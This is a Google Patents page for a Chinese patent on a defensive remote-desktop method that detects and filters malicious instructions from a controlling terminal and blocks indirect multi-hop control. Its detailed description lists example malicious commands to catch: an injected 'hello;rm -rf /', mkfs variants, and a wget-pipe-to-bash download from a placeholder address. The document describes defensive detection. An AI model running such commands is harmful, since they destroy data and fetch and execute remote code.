CN113282923B - 一种远程控制方法、计算设备及存储介质 - Google Patents
一种远程控制方法、计算设备及存储介质 Download PDFInfo
- Publication number
- CN113282923B CN113282923B CN202110828548.5A CN202110828548A CN113282923B CN 113282923 B CN113282923 B CN 113282923B CN 202110828548 A CN202110828548 A CN 202110828548A CN 113282923 B CN113282923 B CN 113282923B
- Authority
- CN
- China
- Prior art keywords
- instruction
- terminal
- target
- malicious
- data
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000000034 method Methods 0.000 title claims abstract description 71
- 238000001914 filtration Methods 0.000 claims abstract description 7
- 238000012544 monitoring process Methods 0.000 claims description 16
- 238000005516 engineering process Methods 0.000 claims description 12
- 241000700605 Viruses Species 0.000 claims description 9
- 230000004044 response Effects 0.000 claims description 6
- 238000004891 communication Methods 0.000 abstract description 22
- 238000010586 diagram Methods 0.000 description 14
- 238000004088 simulation Methods 0.000 description 7
- 230000008569 process Effects 0.000 description 5
- 230000008901 benefit Effects 0.000 description 4
- 238000001514 detection method Methods 0.000 description 4
- 230000006870 function Effects 0.000 description 4
- 238000012545 processing Methods 0.000 description 4
- 230000002093 peripheral effect Effects 0.000 description 3
- 238000011161 development Methods 0.000 description 2
- 238000002955 isolation Methods 0.000 description 2
- 239000000243 solution Substances 0.000 description 2
- 230000007723 transport mechanism Effects 0.000 description 2
- BUGBHKTXTAQXES-UHFFFAOYSA-N Selenium Chemical compound [Se] BUGBHKTXTAQXES-UHFFFAOYSA-N 0.000 description 1
- 230000009471 action Effects 0.000 description 1
- 230000002155 anti-virotic effect Effects 0.000 description 1
- 238000013459 approach Methods 0.000 description 1
- 230000006399 behavior Effects 0.000 description 1
- 230000001419 dependent effect Effects 0.000 description 1
- 238000007667 floating Methods 0.000 description 1
- 238000002347 injection Methods 0.000 description 1
- 239000007924 injection Substances 0.000 description 1
- 230000003993 interaction Effects 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 229910052711 selenium Inorganic materials 0.000 description 1
- 239000011669 selenium Substances 0.000 description 1
- 238000012795 verification Methods 0.000 description 1
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/556—Detecting local intrusion or implementing counter-measures involving covert channels, i.e. data leakage between processes
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/562—Static detection
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Software Systems (AREA)
- Theoretical Computer Science (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Virology (AREA)
- Computer And Data Communications (AREA)
Abstract
本发明公开了一种远程控制方法、计算设备及存储介质,该远程控制方法在第一终端中执行,其中,第一终端与第二终端通信连接,且第一终端受第二终端远程控制,该方法包括:接收来自第二终端的目标指令;检测目标指令是否为恶意指令;若目标指令为恶意指令,则过滤所述目标指令,并生成预警提示;否则,通过执行相应操作来响应所述目标指令。
Description
技术领域
本发明涉及互联网领域,具体涉及一种远程控制方法、计算设备及存储介质。
背景技术
随着网络技术的飞速发展,远程办公或者远程协助等技术被广泛使用,从远程桌面这项技术的出生到成熟,数据安全与隐私保护(例如,破坏用户系统,非法获取用户隐私数据,)一直是它所要解决的关键性技术,近几年的发展也出现了许多相关的技术,例如远程桌面的隔离技术、进程隔离技术等等。但是,也未根本性地解决和预防用户远程过程中出现的不可信命令注入和桌面的非法操作,导致用户数据被泄露,威胁着用户的信息安全和计算机系统安全。
并且,在多级间接远程控制的使用上也存在一定的风险,比如,有a,b,c三台电脑时,a远程控制b,b远程控制c,这样,a间接的控制了c,但是,电脑c的用户可能不希望被a访问,而通过这种间接访问的方式,会导致电脑c上的用户数据泄露给a。
发明内容
鉴于上述问题,提出了本发明以便提供一种克服上述问题或者至少部分地解决上述问题的一种远程控制方法、计算设备及存储介质。
根据本发明的一个方面,提供一种远程控制方法,在第一终端中执行,其中,第一终端与第二终端通信连接,且第一终端受第二终端远程控制,该方法包括:接收来自第二终端的目标指令;检测目标指令是否为恶意指令;若目标指令为恶意指令,则过滤目标指令,并生成预警提示;否则,通过执行相应操作来响应目标指令。
可选地,在根据本发明的远程控制方法中,其中,第一终端还与第三终端通信连接,且第三终端受第一终端远程控制,以及在检测目标指令是否为恶意指令的步骤之前,还包括步骤:识别目标指令指示的目标终端;若目标终端为第三终端,则禁止响应目标指令。
可选地,在根据本发明的远程控制方法中,其中,识别目标指令指示的目标终端的步骤,包括:获取目标指令在第二终端的操作界面上指向的像素点;根据像素点的位置坐标,与预设的像素图像中对应位置坐标的像素点进行匹配来识别所述目标指令指示的目标终端。
可选地,在根据本发明的远程控制方法中,其中,目标指令至少包括控制指令,以及检测目标指令是否为恶意指令的步骤包括:对网络端口进行数据监测,并对监测到的数据进行分析,得到分析结果;基于分析结果,判断控制指令是否为可信指令;若控制指令为不可信指令,则认定控制指令为恶意指令。
可选地,在根据本发明的远程控制方法中,其中,对网络端口进行数据监测,并对监测到的数据进行分析的步骤包括:使用socket套接字编写的监测程序、数据抓包工具、防火墙工具、爬虫工具和大数据关键字模糊匹配技术中的至少一个,实现对网络端口进行数据监测,并对监测到的数据进行分析。
可选地,在根据本发明的远程控制方法中,其中,目标指令至少包括控制指令,以及所述检测目标指令是否为恶意指令的步骤包括:将控制指令与预设的指令库进行匹配,预设的指令库包含多条恶意指令,其中,恶意指令至少包括恶意指令程序和/或病毒;若匹配成功,则认定控制指令为恶意指令。
可选地,在根据本发明的远程控制方法中,其中,目标指令至少包括操作指令,以及检测目标指令是否为恶意指令的步骤包括:通过模拟操作指令,分析操作指令的指令数据,指令数据至少包括操作类型和/或操作对象;基于所分析出的操作类型和/或待处理对象,判定操作指令对应是否为正确的操作;若操作指令是不正确的操作,则认定操作指令为恶意指令,其中,不正确的操作包括:删除系统文件、下载恶意程序、删除用户资料和拷贝用户资料中的至少一种。
可选地,在根据本发明的远程控制方法中,其中,通过模拟操作指令,分析操作指令的指令数据,指令数据至少包括操作类型和/或操作对象的步骤包括:对输入设备的操作进行模拟响应,来分析操作指令的指令数据,其中,输入设备包括:与第一终端耦接的鼠标、键盘中的至少一个。
根据本发明的又一个方面,提供一种计算设备,包括:至少一个处理器;和存储有程序指令的存储器,其中,所述程序指令被配置为适于由所述至少一个处理器执行,所述程序指令包括用于执行上述方法的指令。
根据本发明的又一个方面,提供一种存储有程序指令的可读存储介质,当所述程序指令被计算设备读取并执行时,使得所述计算设备执行上述的方法。
根据本发明的方案,通过检测目标指令是否为恶意指令,如果为恶意指令,则将该目标指令过滤,预防远程不可信或者破坏系统命令注入执行,该方案既可以满足日常办公,又可以很好的保护用户的隐私数据或者商业数据,只要进行一定的设置就可以很放心的让远程用户操作,不用担心有任何的破坏。
根据本发明的方案,在多级间接远程控制场景下,通过识别目标指令指示的受控终端,来确定该目标指令是否为越级远程控制指令。如果为越级远程控制指令,则禁止响应该控制指令,避免导致用户数据泄露。
上述说明仅是本发明技术方案的概述,为了能够更清楚了解本发明的技术手段,而可依照说明书的内容予以实施,并且为了让本发明的上述和其它目的、特征和优点能够更明显易懂,以下特举本发明的具体实施方式。
附图说明
通过阅读下文优选实施方式的详细描述,各种其他的优点和益处对于本领域普通技术人员将变得清楚明了。附图仅用于示出优选实施方式的目的,而并不认为是对本发明的限制。而且在整个附图中,用相同的参考符号表示相同的部件。在附图中:
图1示出了根据本发明一个实施例的计算设备100的示意图;
图2示出了根据本发明一个实施例的远程控制方法200的流程图;
图3示出了根据本发明一个实施例的不正确操作300的示意图;
图4示出了根据本发明一个实施例的远程控制系统400的示意图
图5示出了根据本发明一个实施例的远程控制方法500的流程图;
图6示出了根据本发明一个实施例的远程控制系统600的示意图;
图7示出了根据本发明一个实施例的远程控制系统工作流程700的时序图。
具体实施方式
下面将参照附图更详细地描述本公开的示例性实施例。虽然附图中显示了本公开的示例性实施例,然而应当理解,可以以各种形式实现本公开而不应被这里阐述的实施例所限制。相反,提供这些实施例是为了能够更透彻地理解本公开,并且能够将本公开的范围完整的传达给本领域的技术人员。
在远程桌面解决方案中,远程控制主要包括主控终端和受控终端。例如,主控终端a远程控制受控终端b。在远程过程中存在不可信命令注入或者非法的桌面操作(例如,主控终端a向受控终端b发送不可信命令或者控制受控终端b执行危险操作等),会破坏用户系统或者用户隐私数据被盗取,导致用户数据被泄露,威胁着用户的信息安全和计算机系统安全等安全隐患。
并且,如果在主控终端a远程控至受控终端b的同时,受控终端b也在远程控制受控终端c,会导致主控终端a间接控制受控终端c,但是,受控终端c可能并不系统主控终端a远程控制,因为,这种的间接控制方式导致了受控终端c的数据泄露给主控终端a,存在受控终端c的用户数据被盗取的危险。需要说明的是,对于这种远程间接控制,并不限制于两个受控终端,可以包括多个受控制端,例如,一个主控终端,三个或者四个受控终端。本发明对此不作限定。
为解决上述现有技术中存在的问题,提出本发明的方案。本发明的一个实施例提供了一种远程控制方法,该方法可以在计算设备中执行。图1示出了根据本发明一个实施例的计算设备100的结构图。如图1所示,在基本的配置102中,计算设备100典型地包括系统存储器106和一个或者多个处理器104。存储器总线108可以用于在处理器104和系统存储器106之间的通信。
取决于期望的配置,处理器104可以是任何类型的处理,包括但不限于:微处理器(µP)、微控制器(µC)、数字信息处理器(DSP)或者它们的任何组合。处理器104可以包括诸如一级高速缓存110和二级高速缓存112之类的一个或者多个级别的高速缓存、处理器核心114和寄存器116。示例的处理器核心114可以包括运算逻辑单元(ALU)、浮点数单元(FPU)、数字信号处理核心(DSP核心)或者它们的任何组合。示例的存储器控制器118可以与处理器104一起使用,或者在一些实现中,存储器控制器118可以是处理器104的一个内部部分。
取决于期望的配置,系统存储器106可以是任意类型的存储器,包括但不限于:易失性存储器(诸如RAM)、非易失性存储器(诸如ROM、闪存等)或者它们的任何组合。计算设备中的物理内存通常指的是易失性存储器RAM,磁盘中的数据需要加载至物理内存中才能够被处理器104读取。系统存储器106可以包括操作系统120、一个或者多个应用122以及程序数据124。应用122实际上是多条程序指令,其用于指示处理器104执行相应的操作。在一些实施方式中,在一些实施方式中,应用122可以布置为在操作系统上由一个或多个处理器104利用程序数据124执行指令。操作系统120例如可以是Linux、Windows等,其包括用于处理基本系统服务以及执行依赖于硬件的任务的程序指令。应用122包括用于实现各种用户期望的功能的程序指令,应用122例如可以是浏览器、即时通讯软件、软件开发工具(例如集成开发环境IDE、编译器等)等,但不限于此。当应用122被安装到计算设备100中时,可以向操作系统120添加驱动模块。
在计算设备100启动运行时,处理器104会从存储器106中读取操作系统120的程序指令并执行。应用122运行在操作系统120之上,利用操作系统120以及底层硬件提供的接口来实现各种用户期望的功能。当用户启动应用122时,应用122会加载至存储器106中,处理器104从存储器106中读取并执行应用122的程序指令。
计算设备100还包括储存设备132,储存设备132包括可移除储存器136和不可移除储存器138,可移除储存器136和不可移除储存器138均与储存接口总线134连接。
计算设备100还可以包括有助于从各种接口设备(例如,输出设备142、外设接口144和通信设备146)到基本配置102经由总线/接口控制器130的通信的接口总线140。示例的输出设备142包括图形处理单元148和音频处理单元150。它们可以被配置为有助于经由一个或者多个A/V端口152与诸如显示器或者扬声器之类的各种外部设备进行通信。示例外设接口144可以包括串行接口控制器154和并行接口控制器156,它们可以被配置为有助于经由一个或者多个I/O端口158和诸如输入设备(例如,键盘、鼠标、笔、语音输入设备、触摸输入设备)或者其他外设(例如打印机、扫描仪等)之类的外部设备进行通信。示例的通信设备146可以包括网络控制器160,其可以被布置为便于经由一个或者多个通信端口164与一个或者多个其他计算设备162通过网络通信链路的通信。
网络通信链路可以是通信介质的一个示例。通信介质通常可以体现为在诸如载波或者其他传输机制之类的调制数据信号中的计算机可读指令、数据结构、程序模块,并且可以包括任何信息递送介质。“调制数据信号”可以这样的信号,它的数据集中的一个或者多个或者它的改变可以在信号中编码信息的方式进行。作为非限制性的示例,通信介质可以包括诸如有线网络或者专线网络之类的有线介质,以及诸如声音、射频(RF)、微波、红外(IR)或者其它无线介质在内的各种无线介质。这里使用的术语计算机可读介质可以包括存储介质和通信介质二者。
计算设备100还包括与总线/接口控制器130相连的储存接口总线134。储存接口总线134与储存设备132相连,储存设备132适于进行数据存储。示例的储存设备132可以包括可移除储存器136(例如CD、DVD、U盘、可移动硬盘等)和不可移除储存器138(例如硬盘驱动器HDD等)。
在根据本发明的计算设备100中,应用122包括执行方法200和执行方法400的多条程序指令。
图2示出了根据本发明一个实施例的方法200的流程图。方法200适于在计算设备(例如前述计算设备100)中执行。
如图2所示,方法200的目的是实现一种远程控制方法,在第一终端执行,其中,第一终端与第二终端通信连接,且第一终端受第二终端远程控制。需要说明的是,该第一终端和第二终端也可称为第一计算设备和第二计算设备。该方法始于步骤S202,在步骤S202中,接收来自第二终端的目标指令。该目标指令包括控制指令和操作指令中的至少一种。在本实施例中,控制指令通常指第二终端(主控终端)向第一终端(受控终端)发送的数据或数据包等。操作指令通常指第二终端对第一终端进行远程桌面操作,例如,第二终端远程打开驻留在第一终端的系统文件等。一般的远程控制程序中均包括通信模块和操控模块。通信模块用于实现主控终端(第二终端)和受控终端(第一终端)之间的数据交互,对应本实施例中的控制指令。操控模块用于实现主控终端(第二终端)对受控终端(第一终端)进行各种增删改查的操作,对应本实施例中的操作指令。
在步骤S204中,检测目标指令是否为恶意指令。前述提到,目标指令包括控制指令和操作指令中的至少一种。对于控制指令和操作指令而言,检测方法不同。以下分别进行说明:
当目标指令为控制指令时,在一些实施例中,可通过如下子步骤实现对目标指令的检测。
步骤S224、对网络端口进行数据监测,并对监测到的数据进行分析。网络端口为终端设备接收数据接口,通过对网络端口进行数据监测可及时对接收的数据进行处理。
其中,对于网络端口进行数据监测,并对监测到的数据进行分析方法可包括:
1)使用socket套接字编写的监测程序对网络端口进行数据监测,并对监测到的数据进行分析。
2)使用数据抓包工具对网络端口进行数据监测,并对监测到的数据进行分析。数据抓包工具可采用外部程序工具socketTool.nc,tcpdump等,本申请对此不做限定。
3)使用防火墙工具对网络端口进行数据监测,并对监测到的数据进行分析。防护墙技术可在网络层对数据包进行选择分析过滤。
4)使用爬虫工具对网络端口进行数据监测,并对监测到的数据进行分析。
5)使用大数据关键字模糊匹配技术对网络端口进行数据监测,并对监测到的数据进行分析。
需要说明的是,以上几种方式可以单独使用,以检测目标指令;亦可以通过组合的方式来检测目标指令;甚至可以与其它已有的检测/过滤方式进行结合,本发明实施例对此不做限制。
步骤S244、基于分析结果,判断控制指令是否为可信指令。可信指令指可信赖的数据指令。
步骤S264、若控制指令为不可信指令,则认定控制指令为恶意指令。
当然,除了上述通过对第一终端的网络端口进行数据监测的方法检测控制指令是否为可信指令外,也可通过其他方法实现检测控制指令是否为恶意指令。
具体地,在一些实施例中,将控制指令与预设的指令库进行匹配。若匹配成功,则认定控制指令为恶意指令。预设的指令库中包括有多条恶意指令,该恶意指令至少包括恶意指令程序和/或病毒。
在一个具体示例中,预设的指令库可以为用户自己构建的本地恶意指令程序库,恶意指令程序是指破坏系统或者侵犯用户隐私的程序或者指令,恶意指令程序库的构建是通过大数据网络收集,用户反馈上报,各大安全公司安全通报以及各个从事网络和系统专家们提供恶意代码端程恶意工具,最终构建成恶意指令程序库,它可以服务于离线系统也可以从网络服务上进行数据分析校验。
另外,预设的指令库也可是现有的病毒库。现在的计算机系统都提供离线杀毒软件,而病毒库作为病毒集合体数据库,里面提供了全世界各种各样的系统病毒,无法过滤的程序命令,代码段可以通过安全公司认证的病毒库进行安全过滤,保证系统正常运行。
当目标指令为操作指令时,在一些实施例中,可通过如下子方法实现对操作指令的检测。
首先,通过模拟操作指令,分析操作指令的指令数据,指令数据至少包括操作类型和/或操作对象。操作类型例如是点击、输入、双击等。操作对象为操作的文件、程序和系统。具体地,对输入设备的操作进行模拟响应,来分析操作指令的指令数据,其中,输入设备至少包括:与第一终端耦接的鼠标、键盘中的至少一个。通过对键盘和鼠标设备进行采集识别操作指令的指令数据。
示例性的,主控终端(第二终端)能够远程操控受控终端(第一终端)的原理为,主控终端发送的操作指令可模拟受控终端的硬件设备对受控终端进行操作。
在一个具体示例中,可通过硬件设备模拟工具实现第二终端对第一终端的远程操作控制。例如通过鼠标模拟工具进行鼠标操作的模拟响应,常用的工具PyUserInput,Selenium,robot.qt等工具库。用户使用鼠标进行删除用户重要的系统文件时,通过这些工具检测鼠标模拟点击,通过点击的操作类型和鼠标屏幕位置分析出操作正确性。图3示出根据本发明一个实施例的不正确操作300的示意图。如图3所示,用户鼠标点击系统etc目录进行右键菜单选择删除按钮,如果不进行恶意操作限制,那么删除etc目录意味着破坏系统,针对这种行为,在进行远程模拟操作时要迅速识别,给用户反馈。
然后,基于所分析出的操作类型和/或待处理对象,判定操作指令对应是否为正确的操作。
不正确操作的类型有很多,在一些实施例中,不正确的操作包括:删除系统文件、下载恶意程序、删除用户资料和拷贝用户资料中的至少一种。
在一个具体示例中,列举以下具体的不正确操作指令:
1、致使操作系统奔溃的不正确操作指令:rm -rf /,假如用户远程终端输入是这样的“hello;rm -rf /”,如果不处理用户系统就行执行rm -rf /这条语句,这个命令会导致用户系统奔溃,用户数据全部删除,这样的风险任何人都无法承担。
2、致使文件系统崩溃的不正确操作指令:: mkfs mkfs.ext3 mkfs.anything。
3、从远程下载恶意程序的不正确操作指令:
wget -q -O- http://192.168.1.0/恶意程序 | bash。
最后,若操作指令是不正确的操作,则认定操作指令为恶意指令。
另外,对于目标指令既包括控制指令和操作指令的场景,可一一检测控制指令和操作指令是否为恶意指令,例如,先检测控制指令再检测操作指令或者先检测操作指令再检测控制指令,本实施例对此不做限定。需要说明的是,当控制指令和操作指令中任一个被检测出为恶意指令,则认定该目标指令为恶意指令。
在步骤S206中,若目标指令为恶意指令,则过滤目标指令,并生成预警提示。否则,通过执行相应操作来响应目标指令。换言之,若通过前述步骤S204检测出目标指令为恶意指令,则禁止对该目标指令进行响应,并生成相应的预警提示,用于提示用户。若通过前述步骤S204检测出目标指令为非恶意指令,则执行相应的操作。
在一个具体示例中,参考图4,图4示出根据本发明一个实施例的远程控制系统400的示意图。其中,该系统400适用于上述方法200。
如图4所述,该系统400包括第一终端410和第二终端420。其中,第一终端410和第二终端420通信连接。第二终端420,适于向第一终端410发送控制指令和/或操作指令。第一终端410,适于检测控制指令和/或目标指令是否为恶意指令,具体地,对于控制指令,可通过监测该第一终端410的网络端口数据和/或将该控制指令与驻留在该第一终端410中的指令库进行匹配来等方法来检测该控制指令是否为恶意指令;对于操作指令,可通过采集硬件设备模拟工具的模拟动作来检测该操作指令是否为恶意指令。还适于在检测到该控制指令和/或操作指令为恶意指令时,过滤该控制指令和/或操作指令,并生成预警提示,在检测到该控制指令和/或操作指令为非恶意指令时,执行相应操作来响应控制指令和/或操作指令。
图5示出了根据本发明一个实施例的方法500的流程图。方法500适于在计算设备(例如前述计算设备100)中执行。
如图5所示,方法500的目的是实现一种多级间接远程控制方法,在第一终端执行,其中,第一终端分别与第二终端和第三终端通信连接,且第一终端受第二终端远程控制,第三终端受第一终端远程控制。换言之,第二终端可通过第一终端间接控制第三终端。需要说明的是,如图6所示的应用场景仅仅为示例性的,根据本实施例的多级远程控制方法的应用场景并不局限于3个终端,也可适用于更多终端的应用场景,本实施例对此不做限定。该方法始于步骤S502,在步骤S502中,接收来自第二终端的目标指令。
在步骤S504中,识别目标指令指示的目标终端。可基于像素点匹配法,识别目标指令指示的目标终端。具体地,可先获取目标指令在第二终端的操作界面上指向的像素点;根据像素点的位置坐标,与预设的像素图像中对应位置坐标的像素点进行匹配来识别目标指令指示的目标终端。其中,该预设的像素图像为在第二终端当前显示界面显示内容形成的图像。在步骤S506中,若目标终端为第三终端,则禁止响应所述目标指令。
在一个具体示例中,第二终端的显示界面同时显示第一终端的显示界面和第三终端的显示界面。而第一终端的显示界面显示有第三终端的显示界面。第二终端需要向第三终端发送目标指令时,需要通过第一终端转发。为防止第二终端对第三终端进行控制,可先获取第二终端当前显示界面的显示内容图像(即预设的像素图像,该预设的像素图像上分别显示有第一终端、第二终端和第三终端的显示界面),用户在第二终端的显示界面进行操作时(例如,鼠标点击操作),操作位置对应在预设的像素图像上的像素点,根据该像素点的坐标位置,与预设的像素图像进行像素点匹配。若对应的像素点匹配成功,则说明该像素点落在了第三终端的显示界面内,将该目标指令过滤,避免第三终端对该目标指令进行响应。
当然,若该目标指令指示的目标终端为第一终端,则继续执行上述方法200中的步骤S204到步骤S208。或者直接对该目标指令进行响应。在本实施例中,对此不做限定。
图6示出根据本发明一个实施例的远程控制系统600的示意图。如图6所示,该系统600包括:第一终端610、第二终端620和第三终端630。
其中,第一终端610分别与第二终端620和第三终端630通信连接,且第一终端610受第二终端620远程控制,第三终端630受第一终端610远程控制。换言之,第二终端620可通过第一终端610间接控制第三终端630。需要说明的是,如图6所示的应用场景仅仅为示例性的,根据本实施例的多级远程控制方法的应用场景并不局限于3个终端,也可适用于更多终端的应用场景,本实施例对此不做限定。
在一个具体示例中,结合图7对该系统600的工作原理进行如下说明:
图7示出了根据本发明一个实施例的远程控制系统工作流程700的时序图。
步骤S701、第一终端与第二终端进行远程连接。
步骤S702、第一终端与第三终端进行远程连接。
步骤S703、第二终端向第一终端发送目标指令。
步骤S704、第一终端识别该目标指令指示的目标终端,若检测到该目标指令指示的目标终端为第三终端,则执行步骤S705,否则执行步骤S706。
步骤S705、第一终端向第三终端发送禁止响应该目标指令的控制指令。
步骤S706、检测该目标指令是否为恶意指令,若检测到该目标指令为恶意指令,则执行步骤S707,否者执行步骤S708。
步骤S707、过滤该目标指令,并生成预警提示。
步骤S708、执行相应操作来响应目标指令。
这里描述的各种技术可结合硬件或软件,或者它们的组合一起实现。从而,本发明的方法和设备,或者本发明的方法和设备的某些方面或部分可采取嵌入有形媒介,例如可移动硬盘、U盘、软盘、CD-ROM或者其它任意机器可读的存储介质中的程序代码(即指令)的形式,其中当程序被载入诸如计算机之类的机器,并被所述机器执行时,所述机器变成实践本发明的设备。
在程序代码在可编程计算机上执行的情况下,计算设备一般包括处理器、处理器可读的存储介质(包括易失性和非易失性存储器和/或存储元件),至少一个输入装置,和至少一个输出装置。其中,存储器被配置用于存储程序代码;处理器被配置用于根据该存储器中存储的所述程序代码中的指令,执行本发明的方法。
以示例而非限制的方式,可读介质包括可读存储介质和通信介质。可读存储介质存储诸如计算机可读指令、数据结构、程序模块或其它数据等信息。通信介质一般以诸如载波或其它传输机制等已调制数据信号来体现计算机可读指令、数据结构、程序模块或其它数据,并且包括任何信息传递介质。以上的任一种的组合也包括在可读介质的范围之内。
在此处所提供的说明书中,算法和显示不与任何特定计算机、虚拟系统或者其它设备固有相关。各种通用系统也可以与本发明的示例一起使用。根据上面的描述,构造这类系统所要求的结构是显而易见的。此外,本发明也不针对任何特定编程语言。应当明白,可以利用各种编程语言实现在此描述的本发明的内容,并且上面对特定语言所做的描述是为了披露本发明的较佳实施方式。
在此处所提供的说明书中,说明了大量具体细节。然而,能够理解,本发明的实施例可以在没有这些具体细节的情况下被实践。在一些实例中,并未详细示出公知的方法、结构和技术,以便不模糊对本说明书的理解。
类似地,应当理解,为了精简本公开并帮助理解各个发明方面中的一个或多个,在上面对本发明的示例性实施例的描述中,本发明的各个特征有时被一起分组到单个实施例、图、或者对其的描述中。然而,并不应将该公开的方法解释成反映如下意图:即所要求保护的本发明要求比在每个权利要求中所明确记载的特征更多特征。更确切地说,如下面所反映的那样,发明方面在于少于前面公开的单个实施例的所有特征。因此,遵循具体实施方式的权利要求书由此明确地并入该具体实施方式,其中每个权利要求本身都作为本发明的单独实施例。
本领域那些技术人员应当理解在本文所公开的示例中的设备的模块或单元或组件可以布置在如该实施例中所描述的设备中,或者可替换地可以定位在与该示例中的设备不同的一个或多个设备中。前述示例中的模块可以组合为一个模块或者此外可以分成多个子模块。
本领域那些技术人员可以理解,可以对实施例中的设备中的模块进行自适应性地改变并且把它们设置在与该实施例不同的一个或多个设备中。可以把实施例中的模块或单元或组件组合成一个模块或单元或组件,以及此外可以把它们分成多个子模块或子单元或子组件。除了这样的特征和/或过程或者单元中的至少一些是相互排斥之外,可以采用任何组合对本说明书(包括伴随的权利要求、摘要和附图)中公开的所有特征以及如此公开的任何方法或者设备的所有过程或单元进行组合。除非另外明确陈述,本说明书(包括伴随的权利要求、摘要和附图)中公开的每个特征可以由提供相同、等同或相似目的的替代特征来代替。
此外,本领域的技术人员能够理解,尽管在此所述的一些实施例包括其它实施例中所包括的某些特征而不是其它特征,但是不同实施例的特征的组合意味着处于本发明的范围之内并且形成不同的实施例。例如,在下面的权利要求书中,所要求保护的实施例的任意之一都可以以任意的组合方式来使用。
此外,所述实施例中的一些在此被描述成可以由计算机系统的处理器或者由执行所述功能的其它装置实施的方法或方法元素的组合。因此,具有用于实施所述方法或方法元素的必要指令的处理器形成用于实施该方法或方法元素的装置。此外,装置实施例的在此所述的元素是如下装置的例子:该装置用于实施由为了实施该发明的目的的元素所执行的功能。
如在此所使用的那样,除非另行规定,使用序数词“第一”、“第二”、“第三”等等来描述普通对象仅仅表示涉及类似对象的不同实例,并且并不意图暗示这样被描述的对象必须具有时间上、空间上、排序方面或者以任意其它方式的给定顺序。
尽管根据有限数量的实施例描述了本发明,但是受益于上面的描述,本技术领域内的技术人员明白,在由此描述的本发明的范围内,可以设想其它实施例。此外,应当注意,本说明书中使用的语言主要是为了可读性和教导的目的而选择的,而不是为了解释或者限定本发明的主题而选择的。因此,在不偏离所附权利要求书的范围和精神的情况下,对于本技术领域的普通技术人员来说许多修改和变更都是显而易见的。对于本发明的范围,对本发明所做的公开是说明性的而非限制性的,本发明的范围由所附权利要求书限定。
Claims (8)
1.一种远程控制方法,在第一终端中执行,其中,所述第一终端与第二终端通信连接,且所述第一终端受所述第二终端远程控制,所述第一终端还与第三终端通信连接,且所述第三终端受所述第一终端远程控制,该方法包括:
接收来自所述第二终端的目标指令;
识别所述目标指令指示的目标终端,具体包括:获取所述目标指令在所述第二终端的操作界面上指向的像素点,根据所述像素点的位置坐标,与预设的像素图像中对应位置坐标的像素点进行匹配来识别所述目标指令指示的目标终端;
若所述目标终端为所述第三终端,则禁止响应所述目标指令;
检测所述目标指令是否为恶意指令;
若所述目标指令为恶意指令,则过滤所述目标指令,并生成预警提示;
否则,通过执行相应操作来响应所述目标指令。
2.如权利要求1所述的方法,其中,所述目标指令至少包括控制指令,以及所述检测所述目标指令是否为恶意指令的步骤包括:
对网络端口进行数据监测,并对监测到的数据进行分析,得到分析结果;
基于所述分析结果,判断所述控制指令是否为可信指令;
若所述控制指令不为可信指令,则认定所述控制指令为恶意指令。
3.如权利要求2所述的方法,其中,所述对网络端口进行数据监测,并对监测到的数据进行分析的步骤包括:
使用socket套接字编写的监测程序、数据抓包工具、防火墙工具、爬虫工具和大数据关键字模糊匹配技术中的至少一个,实现对网络端口进行数据监测,并对监测到的数据进行分析。
4.如权利要求1所述的方法,其中,所述目标指令至少包括控制指令,以及所述检测所述目标指令是否为恶意指令的步骤包括:
将所述控制指令与预设的指令库进行匹配,所述预设的指令库包含多条恶意指令,其中,恶意指令至少包括恶意指令程序和/或病毒;
若匹配成功,则认定所述控制指令为恶意指令。
5.如权利要求1所述的方法,其中,所述目标指令至少包括操作指令,以及所述检测所述目标指令是否为恶意指令的步骤包括:
通过模拟所述操作指令,分析所述操作指令的指令数据,所述指令数据至少包括操作类型和/或操作对象;
基于所分析出的操作类型和/或待处理对象,判定所述操作指令对应是否为正确的操作;
若所述操作指令是不正确的操作,则认定所述操作指令为恶意指令,其中,所述不正确的操作包括:删除系统文件、下载恶意程序、删除用户资料和拷贝用户资料中的至少一种。
6.如权利要求5所述的方法,其中,所述通过模拟所述操作指令,分析所述操作指令的指令数据,所述指令数据至少包括操作类型和/或操作对象的步骤包括:
对输入设备的操作进行模拟响应,来分析所述操作指令的指令数据,其中,所述输入设备包括:与第一终端耦接的鼠标、键盘中的至少一个。
7.一种计算设备,包括:
至少一个处理器;和
存储有程序指令的存储器,其中,所述程序指令被配置为适于由所述至少一个处理器执行,所述程序指令包括用于执行如权利要求1-6中任一项所述方法的指令。
8.一种存储有程序指令的可读存储介质,当所述程序指令被计算设备读取并执行时,使得所述计算设备执行如权利要求1-6中任一项所述的方法。
Priority Applications (2)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202111193279.6A CN113901454A (zh) | 2021-07-22 | 2021-07-22 | 一种远程控制方法、计算设备及存储介质 |
CN202110828548.5A CN113282923B (zh) | 2021-07-22 | 2021-07-22 | 一种远程控制方法、计算设备及存储介质 |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202110828548.5A CN113282923B (zh) | 2021-07-22 | 2021-07-22 | 一种远程控制方法、计算设备及存储介质 |
Related Child Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202111193279.6A Division CN113901454A (zh) | 2021-07-22 | 2021-07-22 | 一种远程控制方法、计算设备及存储介质 |
Publications (2)
Publication Number | Publication Date |
---|---|
